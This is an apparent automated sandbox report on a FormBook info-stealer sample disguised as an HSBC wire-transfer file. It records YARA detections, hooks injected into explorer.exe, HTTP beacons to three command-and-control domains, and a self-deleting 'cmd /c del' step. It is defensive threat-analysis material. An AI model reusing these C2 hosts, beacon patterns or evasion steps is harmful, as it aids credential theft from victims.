                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000x7262c0x72800False0.890049297216data7.86790735928IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rsrc0x760000x5cc0x600False0.431640625data4.1545049772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x780000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_VERSION0x760900x33cdata
                    RT_MANIFEST0x763dc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                    Imports

                    DLLImport
                    mscoree.dll_CorExeMain

                    Version Infos

                    DescriptionData
                    Translation0x0000 0x04b0
                    LegalCopyrightCopyright Rogers Peet
                    Assembly Version8.0.6.0
                    InternalNameISectionEnt.exe
                    FileVersion5.6.0.0
                    CompanyNameRogers Peet
                    LegalTrademarks
                    Comments
                    ProductNameBiblan
                    ProductVersion5.6.0.0
                    FileDescriptionBiblan
                    OriginalFilenameISectionEnt.exe

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    11/25/21-18:58:23.381848TCP1201ATTACK-RESPONSES 403 Forbidden804980834.102.136.180192.168.2.3
                    11/25/21-18:58:43.848526TCP1201ATTACK-RESPONSES 403 Forbidden804980934.102.136.180192.168.2.3

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 25, 2021 18:58:02.386955023 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:02.402736902 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.402899981 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:02.403076887 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:02.418643951 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.562637091 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.562691927 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.562720060 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.562838078 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:02.562891006 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:23.180499077 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.199862003 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:23.200016975 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.200145006 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.219475985 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:23.381848097 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:23.381875992 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:23.382029057 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.382067919 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.691744089 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.713184118 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.647877932 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.667702913 CET804980934.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.667838097 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.668176889 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.687668085 CET804980934.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.848526001 CET804980934.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.848567009 CET804980934.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.848810911 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.849003077 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.870589972 CET804980934.102.136.180192.168.2.3

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 25, 2021 18:58:02.291693926 CET5213053192.168.2.38.8.8.8
                    Nov 25, 2021 18:58:02.361125946 CET53521308.8.8.8192.168.2.3
                    Nov 25, 2021 18:58:23.095354080 CET5623653192.168.2.38.8.8.8
                    Nov 25, 2021 18:58:23.179235935 CET53562368.8.8.8192.168.2.3
                    Nov 25, 2021 18:58:43.582144022 CET5652753192.168.2.38.8.8.8
                    Nov 25, 2021 18:58:43.645256042 CET53565278.8.8.8192.168.2.3

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Nov 25, 2021 18:58:02.291693926 CET192.168.2.38.8.8.80xd3feStandard query (0)www.piramsgprodiet.storeA (IP address)IN (0x0001)
                    Nov 25, 2021 18:58:23.095354080 CET192.168.2.38.8.8.80x7208Standard query (0)www.gramaltinrafineri.comA (IP address)IN (0x0001)
                    Nov 25, 2021 18:58:43.582144022 CET192.168.2.38.8.8.80x81d2Standard query (0)www.catproductreviews.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Nov 25, 2021 18:58:02.361125946 CET8.8.8.8192.168.2.30xd3feNo error (0)www.piramsgprodiet.storeghs.google.comCNAME (Canonical name)IN (0x0001)
                    Nov 25, 2021 18:58:02.361125946 CET8.8.8.8192.168.2.30xd3feNo error (0)ghs.google.com172.217.168.83A (IP address)IN (0x0001)
                    Nov 25, 2021 18:58:23.179235935 CET8.8.8.8192.168.2.30x7208No error (0)www.gramaltinrafineri.comgramaltinrafineri.comCNAME (Canonical name)IN (0x0001)
                    Nov 25, 2021 18:58:23.179235935 CET8.8.8.8192.168.2.30x7208No error (0)gramaltinrafineri.com34.102.136.180A (IP address)IN (0x0001)
                    Nov 25, 2021 18:58:43.645256042 CET8.8.8.8192.168.2.30x81d2No error (0)www.catproductreviews.comcatproductreviews.comCNAME (Canonical name)IN (0x0001)
                    Nov 25, 2021 18:58:43.645256042 CET8.8.8.8192.168.2.30x81d2No error (0)catproductreviews.com34.102.136.180A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.piramsgprodiet.store
                    • www.gramaltinrafineri.com
                    • www.catproductreviews.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.349784172.217.168.8380C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 25, 2021 18:58:02.403076887 CET8201OUTGET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1
                    Host: www.piramsgprodiet.store
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Nov 25, 2021 18:58:02.562637091 CET8202INHTTP/1.1 301 Moved Permanently
                    Location: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+
                    Content-Type: text/html; charset=UTF-8
                    Date: Thu, 25 Nov 2021 17:58:02 GMT
                    Expires: Thu, 25 Nov 2021 17:58:02 GMT
                    Cache-Control: private, max-age=0
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    Content-Security-Policy: frame-ancestors 'self'
                    X-XSS-Protection: 1; mode=block
                    Server: GSE
                    Accept-Ranges: none
                    Vary: Accept-Encoding
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 31 34 30 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 69 72 61 6d 73 67 70 72 6f 64 69 65 74 2e 73 74 6f 72 65 2f 6d 34 6e 38 2f 3f 6c 30 47 3d 2d 5a 72 64 39 4a 31 70 71 48 4c 64 48 50 6f 26 61 6d 70 3b 35 6a 62 6c 43 46 3d 74 55 72 64 33 37 49 48 4e 77 55 4e 72 4b 79 31 42 41 35 51 52 36 45 55 59 47 36 42 4e 48 79 41 61 59 59 6b 70 55 46 71 6f 50 6c 7a 4b 54 38 77 76 76 78 50 32 2f 41 51 76 37 66 53 69 46 43 39 4b 53 4c 2b 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                    Data Ascii: 140<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Permanently</H1>The document has moved <A HREF="https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+">here</A>.</BODY></HTML>
                    Nov 25, 2021 18:58:02.562691927 CET8202INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.34980834.102.136.18080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 25, 2021 18:58:23.200145006 CET8263OUTGET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1
                    Host: www.gramaltinrafineri.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Nov 25, 2021 18:58:23.381848097 CET8264INHTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Thu, 25 Nov 2021 17:58:23 GMT
                    Content-Type: text/html
                    Content-Length: 275
                    ETag: "61973ffe-113"
                    Via: 1.1 google
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.34980934.102.136.18080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 25, 2021 18:58:43.668176889 CET8265OUTGET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1
                    Host: www.catproductreviews.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Nov 25, 2021 18:58:43.848526001 CET8266INHTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Thu, 25 Nov 2021 17:58:43 GMT
                    Content-Type: text/html
                    Content-Length: 275
                    ETag: "61973ffe-113"
                    Via: 1.1 google
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function NameHook TypeActive in Processes
                    PeekMessageAINLINEexplorer.exe
                    PeekMessageWINLINEexplorer.exe
                    GetMessageWINLINEexplorer.exe
                    GetMessageAINLINEexplorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
                    Function NameHook TypeNew Data
                    PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEF
                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEF
                    GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEF
                    GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEF

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: HSBC ... Wire Transfer Copy.exe PID: 6892 Parent PID: 2244

                    General

                    Start time:18:56:44
                    Start date:25/11/2021
                    Path:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
                    Imagebase:0x3e0000
                    File size:471552 bytes
                    MD5 hash:99B154970D15748D1DF9025F675ECC76
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Chronological Activities

                    Analysis Process: HSBC ... Wire Transfer Copy.exe PID: 7164 Parent PID: 6892

                    General

                    Start time:18:56:47
                    Start date:25/11/2021
                    Path:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Imagebase:0xc00000
                    File size:471552 bytes
                    MD5 hash:99B154970D15748D1DF9025F675ECC76
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Chronological Activities

                    Analysis Process: explorer.exe PID: 3352 Parent PID: 7164

                    General

                    Start time:18:56:50
                    Start date:25/11/2021
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff720ea0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Chronological Activities

                    Analysis Process: ipconfig.exe PID: 6536 Parent PID: 3352

                    General

                    Start time:18:57:12
                    Start date:25/11/2021
                    Path:C:\Windows\SysWOW64\ipconfig.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                    Imagebase:0xc50000
                    File size:29184 bytes
                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:moderate

                    Chronological Activities

                    Analysis Process: cmd.exe PID: 6672 Parent PID: 6536

                    General

                    Start time:18:57:17
                    Start date:25/11/2021
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Analysis Process: conhost.exe PID: 6888 Parent PID: 6672

                    General

                    Start time:18:57:18
                    Start date:25/11/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Disassembly

                    Code Analysis

                    Reset < >

                      Analysis Process: HSBC ... Wire Transfer Copy.exe PID: 6892 Parent PID: 2244 HSBC ... Wire Transfer Copy.exeCOMMON

                      Executed Functions

                      Function 00C6D2F8, Relevance: 5.0, Strings: 3, Instructions: 1295COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: 48Zm$48Zm$d
                      • API String ID: 0-1312976157
                      • Opcode ID: 86cdc9e645dff4f3c6fe5a70be5ae0a096fbdf68e7abc50504d33a12fffa6b18
                      • Instruction ID: 9aa3f51aeca531cd1914772fbdc2fbc324bd196758574c274968aa832d4dcc28
                      • Opcode Fuzzy Hash: 86cdc9e645dff4f3c6fe5a70be5ae0a096fbdf68e7abc50504d33a12fffa6b18
                      • Instruction Fuzzy Hash: 8AC23C78B00205CFDB28DF64D498AA977B2FB89305F1184E6D90A9B359DB34ED42CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00C68250, Relevance: .6, Instructions: 590COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6f3915d0d37d16427c6299adbd2b52b26e86028190d1ccf1bdc7dca482389bb
                      • Instruction ID: d803b59b5d9bb57bd09d3fb410244cc4276b637759fdde2ffb26beaacf047bd6
                      • Opcode Fuzzy Hash: e6f3915d0d37d16427c6299adbd2b52b26e86028190d1ccf1bdc7dca482389bb
                      • Instruction Fuzzy Hash: 7A225631A082528FEF34DB75C4D46BD77A2AF80310F194669D826AB2D5CF38CD49D792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00C64497, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 00C64522
                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID: EncodePointer
                      • String ID:
                      • API String ID: 2118026453-0
                      • Opcode ID: af316b5973df4e9b771f2f9190c5fb46190b4a40ca2cc7ad3c3a02dbbb6d27a3
                      • Instruction ID: 66da87c2ac29ceb745761936c3ba00c9ff6fb1111072d2b3809b0fd784378962
                      • Opcode Fuzzy Hash: af316b5973df4e9b771f2f9190c5fb46190b4a40ca2cc7ad3c3a02dbbb6d27a3
                      • Instruction Fuzzy Hash: FF2179B59043448FDF60CFA5D58979EBFF4FB89324F14842AC805A3601D7389A41CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00C64747, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 00C647CD
                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID: EncodePointer
                      • String ID:
                      • API String ID: 2118026453-0
                      • Opcode ID: 7eac66c46b375a52b928ddbbe11916e7805a996e9321ac0533892ba35efa274f
                      • Instruction ID: 80824f8c281456d79e32cc89c5fb92f4de45932cc77c77ead3ca865a64729b68
                      • Opcode Fuzzy Hash: 7eac66c46b375a52b928ddbbe11916e7805a996e9321ac0533892ba35efa274f
                      • Instruction Fuzzy Hash: 9F21CDB4C003488FDB20DFA5D5847DEBBF4EB49328F24442ED515E3641C7389945CBA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00C644A8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 00C64522
                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID: EncodePointer
                      • String ID:
                      • API String ID: 2118026453-0
                      • Opcode ID: 4ee13576ea16f0f34b454cf8c872275f92f8b9e0e70a5554f88d0245c8226652
